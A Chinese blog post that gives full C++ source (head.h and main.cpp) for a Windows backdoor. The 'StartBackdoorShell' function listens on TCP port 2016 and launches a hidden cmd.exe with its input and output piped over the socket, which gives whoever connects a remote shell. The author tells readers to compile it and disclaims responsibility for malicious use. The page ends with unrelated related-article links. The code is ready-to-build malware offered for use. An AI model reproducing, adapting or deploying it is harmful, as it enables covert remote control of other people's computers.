具体怎么编译,生成执行程序,不懂得先学习C++程序代码编译和集成开发环境。

多的不说了,只有两个代码文件,一个头文件,一个源文件。不多说了,直接上干货。

(恶意使用,或者商用,后果自负,与本人无关。)

head.h

#pragma once

#ifndef WINVER                          // Specifies that the minimum required platform is Windows Vista.
#define WINVER 0x0600 // Change this to the appropriate value to target other versions of Windows.
#endif #ifndef _WIN32_WINNT // Specifies that the minimum required platform is Windows Vista.
#define _WIN32_WINNT 0x0600 // Change this to the appropriate value to target other versions of Windows.
#endif #ifndef _WIN32_WINDOWS // Specifies that the minimum required platform is Windows 98.
#define _WIN32_WINDOWS 0x0410 // Change this to the appropriate value to target Windows Me or later.
#endif #ifndef _WIN32_IE // Specifies that the minimum required platform is Internet Explorer 7.0.
#define _WIN32_IE 0x0700 // Change this to the appropriate value to target other versions of IE.
#endif #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
// Windows Header Files:
#include <windows.h> // Windows Socket Files:
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib") // C RunTime Header Files
#include <stdlib.h>
#include <malloc.h>
#include <memory.h>
#include <tchar.h> class CThreadNode
{
public: SOCKET m_Sock;
HANDLE hPipe;
CThreadNode()
{
m_Sock = INVALID_SOCKET;
hPipe = NULL;
}
};

main.cpp

#include "Head.h"

bool SocketInit()
{
WSADATA wsaData={0};
if ( WSAStartup(MAKEWORD(2, 2), &wsaData) == NO_ERROR )
{
return TRUE;
}
else
{
return FALSE;
}
} int SendData(SOCKET m_Sock, void *pBuf, DWORD dwBufLen)
{
if ( m_Sock == INVALID_SOCKET || !pBuf || dwBufLen <= 0 )
{
return -1;
}
int iCurrSend = 0, offset = 0;
do {
iCurrSend = send(m_Sock, (char *)pBuf+offset, dwBufLen, 0);
if ( iCurrSend <= 0 )
{
break;
}
dwBufLen -= iCurrSend;
offset += iCurrSend;
}
while ( dwBufLen > 0 );
return offset;
} BOOL bExit = FALSE;
#define RECV_BUF_LEN 1024*10
char szCmdBuf[MAX_PATH] = {0}; DWORD WINAPI ThreadInputProcess(LPVOID lpParam)
{
CThreadNode tNode = *(CThreadNode *)lpParam;
DWORD dwWrited = 0, dwRecvd = 0;
char szBuf[MAX_PATH] = {0};
BOOL bRet = FALSE;
while ( TRUE )
{
dwRecvd = recv(tNode.m_Sock, szBuf, MAX_PATH, 0);
if ( dwRecvd > 0 && dwRecvd != SOCKET_ERROR )
{
WriteFile(tNode.hPipe, szBuf, dwRecvd, &dwWrited, NULL);
}
else{
closesocket(tNode.m_Sock);
WriteFile(tNode.hPipe, "exit\r\n", sizeof("exit\r\n"), &dwWrited, NULL);
CloseHandle(tNode.hPipe);
bExit = TRUE;
break;
}
Sleep(50);
}
return TRUE;
} DWORD WINAPI ThreadOutputProcess(LPVOID lpParam)
{
CThreadNode tNode = *(CThreadNode *)lpParam;
char szBuf[RECV_BUF_LEN] = {0};
DWORD dwReadLen = 0, dwTotalAvail = 0;
BOOL bRet = FALSE;
while ( !bExit ) {
dwTotalAvail = 0;
bRet = PeekNamedPipe(tNode.hPipe, NULL, 0, NULL, &dwTotalAvail, NULL);
if ( bRet && dwTotalAvail > 0 ) {
bRet = ReadFile(tNode.hPipe, szBuf, RECV_BUF_LEN, &dwReadLen, NULL);
if ( bRet && dwReadLen > 0 ) {
SendData(tNode.m_Sock, szBuf, dwReadLen);
}
Sleep(50);
}
}
CloseHandle(tNode.hPipe);
return TRUE;
} BOOL StartBackdoorShell(UINT uPort)
{
if ( !SocketInit() ) {
return FALSE;
}
SOCKET m_ListenSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if ( m_ListenSock == INVALID_SOCKET ) {
return FALSE;
}
sockaddr_in sServer = {0};
sServer.sin_family = AF_INET;
sServer.sin_addr.s_addr = htonl(INADDR_ANY);
sServer.sin_port = htons(uPort);
if ( bind(m_ListenSock, (sockaddr *)&sServer, sizeof(sServer)) == SOCKET_ERROR ) {
return FALSE;
}
if ( listen(m_ListenSock, 5) == SOCKET_ERROR ) {
return FALSE;
}
SOCKET m_AcceptSock = accept(m_ListenSock, NULL, NULL);
// Create Pipe;
CThreadNode m_ReadNode, m_WriteNode;
STARTUPINFO si = {0};
si.cb = sizeof(STARTUPINFO);
PROCESS_INFORMATION pi = {0};
DWORD dwThreadRead = 0, dwThreadWrite = 0;
HANDLE hReadPipe1 = NULL, hWritePipe1 = NULL; // Input the command;
HANDLE hReadPipe2 = NULL, hWritePipe2 = NULL; // Get the command results;
HANDLE hThreadOutput = NULL, hThreadInput = NULL;
SECURITY_ATTRIBUTES sa = {0};
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE; if ( !CreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0) || !CreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0) ) {
return FALSE;
}
m_ReadNode.m_Sock = m_WriteNode.m_Sock = m_AcceptSock; GetStartupInfo(&si);
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.hStdInput = hReadPipe1;
si.hStdOutput = si.hStdError = hWritePipe2;
si.wShowWindow = SW_HIDE;
TCHAR szCmdLine[MAX_PATH] = {0};
GetSystemDirectory(szCmdLine, MAX_PATH);
_tcscat_s(szCmdLine, MAX_PATH, _T("\\cmd.exe"));
if ( !CreateProcess(szCmdLine, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi) )
{
return FALSE;
}
m_ReadNode.hPipe = hReadPipe2;
hThreadOutput = CreateThread(NULL, 0, ThreadOutputProcess, &m_ReadNode, 0, &dwThreadWrite);
m_WriteNode.hPipe = hWritePipe1;
hThreadInput = CreateThread(NULL, 0, ThreadInputProcess, &m_WriteNode, 0, &dwThreadRead); HANDLE szHandles[] = { hThreadOutput, hThreadInput };
WaitForMultipleObjects(2, szHandles, TRUE, INFINITE);
return TRUE;
}
int APIENTRY _tWinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
StartBackdoorShell(2016);
ExitProcess(0);
return 0;
}

WinPipe后门程序代码示例(仅限技术交流)的更多相关文章

  1. 最小化JIT示例(仅限Intel x86+Windows)

    #include <Windows.h> #include <cstdint> #include <cstring> #define BACK_FILL (0) i ...

  2. 编译.net .net Core程序 代码,仅做备份

    //创建一个ProcessStartInfo对象 使用系统shell 指定命令和参数 设置标准输出 //编译.net core项目 var psi = new ProcessStartInfo(&qu ...

  3. 微软代码示例:ASP.NET 2.0 三层架构应用程序教程系列

    本文转自:http://www.codeusing.com/hi/uephee.wen/resource/view/170.aspx 资源分类:微软代码示例               更新日期:20 ...

  4. C#/WPF/WinForm/.NET程序代码实现软件程序开机自动启动的两种常用方法的示例与源码下载带详细注释-源码代码-注册表方式-启动目录快捷方式

    C#/WPF/WinForm/.NET程序代码实现软件程序开机自动启动的两种常用方法的示例与源码下载带详细注释-源码代码-注册表方式-启动目录快捷方式 C#实现自动启动的方法-两种方法 源码下载地址: ...

  5. 转:HIBERNATE一些_方法_@注解_代码示例---写的非常好

    HIBERNATE一些_方法_@注解_代码示例操作数据库7步骤 : 1 创建一个SessionFactory对象 2 创建Session对象 3 开启事务Transaction : hibernate ...

  6. My.Ioc 代码示例——利用 ObjectBuilderRequested 事件实现延迟注册

    在使用 Ioc 框架时,一般我们建议集中在一个称为 Composition Root(其含义请参见下面的小注)的位置来注册 (Register) 和解析 (Resolve) 服务.这种做法的目的在于限 ...

  7. JAVA NIO工作原理及代码示例

    简介:本文主要介绍了JAVA NIO中的Buffer, Channel, Selector的工作原理以及使用它们的若干注意事项,最后是利用它们实现服务器和客户端通信的代码实例. 欢迎探讨,如有错误敬请 ...

  8. 2018-11-16 中文代码示例之Programming in Scala笔记第四五六章

    续前文: 中文代码示例之Programming in Scala学习笔记第二三章. 同样仅节选有意思的例程部分作演示之用. 源文档仍在: program-in-chinese/Programming_ ...

  9. 中文代码示例之NW.js桌面应用开发初体验

    先看到了NW.js(应该是前身node-webkit的缩写? 觉得该起个更讲究的名字, 如果是NorthWest之意的话, logo(见下)里的指南针好像也没指着西北啊)和Electron的比较文章: ...

随机推荐

  1. 关于bootstrap的一些运用

    bootstrap用起来很方便,代码量少,写自适应网站最合适了! 关于bootstrap你必须要知道的几点: “行(row)”必须包含在 .container (固定宽度)或 .container-f ...

  2. smarty模板引擎

    1.    使用smarty 1.1 项目引入 // 3, 连接数据库,提取相关数据 $title = "Smarty模板引擎"; $content = "Smarty模 ...

  3. css伪类的展现

    常见的伪类选择器 :link :hover :active :visited 如果为以上几个伪类赋予相同css属性名,不同的css属性值 <!DOCTYPE html> <html ...

  4. hibernate的session对象核心方法注意的问题

    1.session.save()方法 1).session.save()方法会使一个对象从临时状态转变为持久化状态. 2).session.save()方法会赋予持久化对象的OID属性一个ID值,以对 ...

  5. Sublime Text3 快捷键

    选择类 Ctrl+D 选中光标所占的文本,继续操作则会选中下一个相同的文本. Alt+F3 选中文本按下快捷键,即可一次性选择全部的相同文本进行同时编辑.举个栗子:快速选中并更改所有相同的变量名.函数 ...

  6. 老王讲自制RPC框架.(四.序列化与反序列化)

    #(序列化) 在实际的框架中,真正影响效率的就是数据的传输方式,以及传输的准备,或者说是tcp与http,序列化.当然要想提高整个框架的效率,需要采用一种高效的序列化 框架比如流行的protostuf ...

  7. ${param.xxx}获取url中的参数

    在项目中看到了一个很奇怪的EL表达式...${param.catid}...一直找不到param在哪里定义的...(主要是水平太屎...) 然后从网上查了一下才知道是啥... EL表达式${param ...

  8. SQL Server Lock Escalation - 锁升级

    Articles Locking in Microsoft SQL Server (Part 12 – Lock Escalation) http://dba.stackexchange.com/qu ...

  9. onInterceptTouchEvent / onTouchEvent响应事件的详析

    onInterceptTouchEvent(),onTouchEvent() 默认返回false 注:事件分发机制是由 dispatchTouchEvent() 开始分发的 onInterceptTo ...

  10. PBS 安装

    How to install PBS Pro using the configure script. . Install the prerequisite packages for building ...